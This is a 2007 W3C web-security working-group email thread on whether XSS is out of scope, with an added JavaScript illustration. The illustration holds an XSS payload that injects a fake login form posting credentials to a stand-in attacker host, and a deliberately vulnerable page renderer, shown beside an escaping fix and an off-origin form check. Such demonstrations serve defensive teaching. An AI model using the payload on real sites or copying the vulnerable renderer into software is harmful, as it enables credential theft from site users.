
RE: XSS out of scope

From: Dan Schutzer <dan.schutzer@fstc.org>
Date: Fri, 6 Apr 2007 10:39:12 -0400
To: "Mary Ellen Zurko" <Mary_Ellen_Zurko@notesdev.ibm.com>, "Shawn Duffy" <sduffy@aol.net>
Cc: <public-wsc-wg@w3.org>, "Close, Tyler J." <tyler.close@hp.com>
Message-ID: <013401c77859$58b30c20$6500a8c0@dschutzer>
I don't think this should be out of scope; some of our solutions address how
to mitigate this. And some of our suggestions for strengthening the browser
also help in this area.
From: public-wsc-wg-request@w3.org [mailto:public-wsc-wg-request@w3.org] On
Behalf Of Mary Ellen Zurko
Sent: Friday, April 06, 2007 10:11 AM
To: Shawn Duffy <sduffy@aol.net>
Cc: public-wsc-wg@w3.org; Close, Tyler J.
Subject: Re: XSS out of scope


I think it has to be. But could you offer up a scenario of what we would do
if it wasn't, just so I can be sure? (or maybe someone who's sure will


Mary Ellen Zurko, STSM, IBM Lotus CTO Office       (t/l 333-6389)
Lotus/WPLC Security Strategy and Patent Innovation Architect

From: Shawn Duffy <sduffy@aol.net>
Sent by: public-wsc-wg-request@w3.org
Date: 04/05/2007 10:44 AM
To: "Close, Tyler J." <tyler.close@hp.com>
Subject: Re: XSS out of scope

Does this also include phishing that is only made possible via XSS, such
as a "trusted" site that has been injected with a fake login form via
XSS?  Is that also out of scope?  Just want to make sure I'm clear where
we're drawing the boundary...

Close, Tyler J. wrote:
> I've added a new Out of scope section to our Note to cover XSS attacks.
> See:
> http://www.w3.org/2006/WSC/drafts/note/#XSS
> This edit addresses ACTION-160
> Tyler
Received on Friday, 6 April 2007 14:40:01 UTC
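The scenario Shawn Duffy asks about, a trusted site that reflects untrusted input into its HTML and thereby hosts an attacker's login form, as an added example that is not part of the thread or of the WSC Note. The site (bank.example), the welcome page, its "name" parameter and the attacker host (evil.example) are all assumptions for illustration; the vulnerable renderer sits beside its escaped form, and a small check lists which forms on the rendered page would post credentials off-origin.

```javascript
// Added example, not code from the original thread. Models the scenario
// Shawn Duffy raises: a reflected XSS flaw on a trusted site used to inject a
// fake login form. The site, page, parameter and attacker host are assumed.
const SITE_ORIGIN = "https://bank.example";      // assumed trusted site
const ATTACKER_ORIGIN = "https://evil.example";  // assumed attacker host

// Constructed payload an attacker would place in a link to the trusted site:
// hide the real login form, then render a look-alike that posts elsewhere.
const PHISH_PAYLOAD =
  "<style>#login{display:none}</style>" +
  '<form id="phish" action="' + ATTACKER_ORIGIN + '/collect" method="post">' +
  "Your session expired, please sign in again: " +
  '<input name="user"><input name="pass" type="password">' +
  "<button>Sign in</button></form>";

// Vulnerable page: reflects the untrusted "name" parameter into HTML verbatim,
// so browser-visible indicators (URL, lock icon, certificate) all still belong
// to the trusted site while the form they frame belongs to the attacker.
function renderWelcomeVulnerable(name) {
  return (
    "<h1>Welcome back, " + name + "</h1>" +
    '<form id="login" action="' + SITE_ORIGIN + '/login" method="post">' +
    '<input name="user"><input name="pass" type="password"></form>'
  );
}

// Escape for the HTML text and double-quoted attribute-value contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened page: same template, untrusted value escaped before insertion,
// so the payload is displayed as text instead of parsed as markup.
function renderWelcomeSafe(name) {
  return (
    "<h1>Welcome back, " + escapeHtml(name) + "</h1>" +
    '<form id="login" action="' + SITE_ORIGIN + '/login" method="post">' +
    '<input name="user"><input name="pass" type="password"></form>'
  );
}

// Extract the action URL of every <form> in a rendered page. A regex over
// serialized HTML is enough for this constructed input; a real check would
// walk the DOM after the browser has parsed it.
function formActions(html) {
  const actions = [];
  const re = /<form\b[^>]*\baction="([^"]*)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) actions.push(m[1]);
  return actions;
}

// Forms whose action resolves to an origin other than the site's own: the
// signal that a "trusted" page is now submitting credentials elsewhere.
// Relative actions are resolved against the site origin before comparing.
function offOriginForms(html) {
  return formActions(html).filter(
    (a) => new URL(a, SITE_ORIGIN).origin !== SITE_ORIGIN
  );
}

// Stand-alone demonstration: the vulnerable page carries one off-origin form,
// the hardened page none.
console.log("vulnerable:", offOriginForms(renderWelcomeVulnerable(PHISH_PAYLOAD)));
console.log("hardened:  ", offOriginForms(renderWelcomeSafe(PHISH_PAYLOAD)));
```

The point the example makes about scope: nothing the browser can display about the page (origin, TLS state, site identity) distinguishes the vulnerable rendering from the legitimate one, because both are genuinely served by the trusted site; the only difference is where the injected form posts, which is why this kind of phishing is argued here to belong to the site's output encoding rather than to browser security indicators.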
